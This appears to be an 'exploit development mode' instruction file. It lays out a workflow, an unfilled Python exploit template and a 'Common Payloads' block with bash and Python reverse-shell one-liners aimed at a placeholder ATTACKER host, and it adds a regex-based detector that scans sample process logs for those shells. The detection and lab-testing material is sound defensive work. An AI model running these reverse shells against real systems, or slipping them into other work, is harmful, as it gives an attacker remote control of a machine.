mode-exploit


Exploit Development Mode


Workflow


  1. Analyze → Understand vulnerability, root cause
  2. Research → Find similar exploits, CVEs, techniques
  3. Develop → Write exploit code
  4. Test → Verify in controlled environment
  5. Document → PoC, usage instructions, impact

Exploit Template (Python)


```python
#!/usr/bin/env python3
"""
Exploit: [CVE-XXXX-XXXX / Vuln Name]
Target: [Software/Version]
Type: [RCE/SQLi/LFI/etc]
Author: [Name]
"""

import argparse

import requests  # HTTP client for the exploit body; drop it if the target is not web-based


def exploit(target: str, cmd: str = "id") -> str:
    """Main exploit logic: return the command output (or other result) as a string."""
    # Exploit code here
    raise NotImplementedError("fill in the exploit logic for the target")


def main():
    parser = argparse.ArgumentParser(description="Exploit description")
    parser.add_argument("target", help="Target URL/IP")
    parser.add_argument("-c", "--cmd", default="id", help="Command to execute")
    args = parser.parse_args()

    result = exploit(args.target, args.cmd)
    print(result)


if __name__ == "__main__":
    main()
```

Common Payloads


```bash
# Reverse shell (bash)
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1

# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
```
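When a payload is run in the lab (the Test step of the workflow), it is worth confirming that the lab's process telemetry actually records it. The following is an added example, not part of the original mode file: it scans constructed process-execution log lines for the two reverse-shell forms listed above. The log format, the regexes and the 10.0.0.5:4444 endpoint are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Constructed signatures for the two one-liners above (an assumption of this
# example, not a vendor rule set): the bash /dev/tcp redirect and the
# python socket + dup2 + shell pattern. Host and port are left open.
REVERSE_SHELL_PATTERNS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/[\w.\-]+/\d+"),
    "python_dup2_shell": re.compile(
        r"python\d?.*socket\.socket\(\).*os\.dup2\(.*/bin/(?:ba)?sh"
    ),
}


@dataclass
class Finding:
    line_no: int
    rule: str
    cmdline: str


def scan_cmdlines(lines):
    """Return one Finding per log line that matches a reverse-shell pattern."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for rule, pattern in REVERSE_SHELL_PATTERNS.items():
            if pattern.search(line):
                findings.append(Finding(line_no, rule, line.strip()))
                break  # one finding per line is enough for triage
    return findings


# Constructed sample of process-execution telemetry (not real log data).
SAMPLE_LOG = [
    "exe=/bin/bash cmd='bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'",
    "exe=/usr/bin/python3 cmd='python3 -c import socket,subprocess,os;"
    's=socket.socket();s.connect(("10.0.0.5",4444));os.dup2(s.fileno(),0);'
    'os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'',
    "exe=/usr/bin/python3 cmd='python3 manage.py runserver'",
    "exe=/bin/bash cmd='cat /dev/tcp_stats'",  # near-miss: no /dev/tcp/host/port
]

if __name__ == "__main__":
    for f in scan_cmdlines(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.cmdline}")
```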

Principles


  • Test in lab environment first
  • Document all steps clearly
  • Include cleanup/restore steps
  • Follow responsible disclosure